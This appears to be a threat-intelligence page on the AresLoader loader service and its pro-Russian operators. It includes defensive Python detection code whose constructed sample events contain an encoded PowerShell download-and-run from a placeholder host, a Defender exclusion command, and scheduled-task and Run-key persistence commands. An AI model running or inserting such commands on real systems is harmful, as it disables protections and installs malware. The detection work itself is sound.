AresLoader MaaS Used to Distribute Information Stealing Malware
Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Intel471
A new loader malware-as-a-service (MaaS), AresLoader, has been identified in the wild. The service is run by threat actors linked to pro-Russian hacktivism, and its customers use it to distribute a variety of information stealers. According to Intel471, the first sighting of AresLoader in the wild was on January 26th, 2023. A distinguishing feature of AresLoader is its "binder" tool, which lets users disguise their malware as a legitimate application. In November 2022, a threat actor using the handles AiD Lock or DarkBLUP introduced AresLoader on Telegram and later advertised it on the underground cybercrime forums RAMP and XSS.
"The group we associated AiD Lock with, PHANTOM DEV, engaged in hacktivist activities in mid-2022 and claimed affiliation with the Red Hackers Alliance Russia (aka RHA, RHA R) pro-Russian hacktivist group. Evidence suggests multiple members of this group are either users or administrators of the AresLoader MaaS," Intel471 assessed. Further analysis of an AresLoader infection found that the malware, disguised as a popular application, launches the legitimate software alongside a malicious batch script. The script adds an exclusion path in Windows Defender, then downloads and executes information-stealing malware such as Raccoon Stealer. For persistence, AresLoader creates a scheduled task and also adds a value under the Run registry key.
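The chain described above maps onto detections a SOC would stack together: a Defender exclusion, encoded PowerShell that fetches a payload, and scheduled-task plus Run-key persistence, all spawned by the same batch script. The Python below is an added example written for this page, not Anvilogic's or Intel471's code. The process-creation events, paths, task name and download URL are constructed to resemble the described behaviour; they are not AresLoader indicators, and the exact command-line forms AresLoader uses are an assumption.

```python
"""Detection logic for a script-driven loader chain: Defender tampering,
encoded PowerShell download, scheduled-task and Run-key persistence,
correlated by parent process. All sample data below is constructed."""
import base64
import re
from collections import defaultdict

# Strings that indicate a download/execute stage inside decoded PowerShell.
PS_DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                       "iwr ", "start-bitstransfer", "webclient")


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid.
    PowerShell expects base64 over UTF-16LE text."""
    m = re.search(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Tag one process-creation event with the behaviours it exhibits."""
    tags = set()
    cmd = event["cmdline"]
    low = cmd.lower()
    image = event["image"].lower()
    # Defender exclusion added, protection disabled, or Exclusions key written directly.
    if (re.search(r"add-mppreference\s+-exclusion", low)
            or re.search(r"set-mppreference\s+-disable", low)
            or r"windows defender\exclusions" in low):
        tags.add("defender_tamper")
    # Encoded PowerShell: decode it and look for a download stage inside.
    if image.endswith("powershell.exe") or image.endswith("pwsh.exe"):
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            tags.add("encoded_powershell")
            if any(mk in decoded.lower() for mk in PS_DOWNLOAD_MARKERS):
                tags.add("download_payload")
    elif any(mk in low for mk in ("certutil -urlcache", "bitsadmin /transfer", "curl ", "wget ")):
        tags.add("download_payload")
    # Persistence via scheduled task or Run key.
    if image.endswith("schtasks.exe") and "/create" in low:
        tags.add("persist_schtask")
    if image.endswith("reg.exe") and " add " in low and r"currentversion\run" in low:
        tags.add("persist_runkey")
    return tags


def correlate(events, min_behaviours=3):
    """Report each script interpreter (.bat/.cmd/.ps1/.vbs parent) whose children
    together show at least `min_behaviours` distinct behaviours as one chain."""
    by_pid = {e["pid"]: e for e in events}
    per_parent = defaultdict(set)
    for e in events:
        for tag in classify(e):
            per_parent[e["ppid"]].add(tag)
    chains = []
    for ppid, tags in per_parent.items():
        parent = by_pid.get(ppid)
        parent_cmd = parent["cmdline"].lower() if parent else ""
        script_parent = any(ext in parent_cmd for ext in (".bat", ".cmd", ".ps1", ".vbs"))
        if script_parent and len(tags) >= min_behaviours:
            chains.append({"ppid": ppid, "parent": parent["cmdline"], "behaviours": sorted(tags)})
    return chains


# Constructed encoded command: a hypothetical download-and-run stage (example.invalid is a reserved name).
_PAYLOAD = ("(New-Object Net.WebClient).DownloadFile('http://example.invalid/r.exe',"
            "'C:\\Users\\victim\\AppData\\Local\\Temp\\svc.exe'); "
            "Start-Process 'C:\\Users\\victim\\AppData\\Local\\Temp\\svc.exe'")
ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()

# Constructed Sysmon-style process-creation events (not real AresLoader telemetry).
TEMP = r"C:\Users\victim\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "' + TEMP + r'\setup.bat"'},
    {"pid": 4104, "ppid": 4100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -Command "Add-MpPreference -ExclusionPath ' + TEMP + '"'},
    {"pid": 4110, "ppid": 4100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc onlogon /tn "UpdateCheck" /tr "' + TEMP + r'\svc.exe" /f'},
    {"pid": 4130, "ppid": 4100, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v UpdateCheck /t REG_SZ /d "
                + TEMP + r"\svc.exe /f"},
    # The legitimate decoy application launched alongside the script: must not fire.
    {"pid": 5000, "ppid": 3900, "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmdline": r'"C:\Program Files\Notepad++\notepad++.exe"'},
]

if __name__ == "__main__":
    for chain in correlate(SAMPLE_EVENTS):
        print(chain)
```

Each rule on its own would be noisy in a large estate (administrators do add Defender exclusions and create scheduled tasks); the value is in `correlate`, which only raises a chain when several of those behaviours share a script-interpreter parent, which is what the "Script Modifies System/Download Payloads with Persistence" use case is after. The decoy application spawned by the same loader produces no tags, so it does not pollute the chain.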
Anvilogic Use Cases:
- AVL_UC17231 - Script Modifies System/Download Payloads with Persistence
- AVL_UC1001 - Encoded Powershell Command
- AVL_UC5996 - Modify Windows Defender
- AVL_UC6144 - Output to File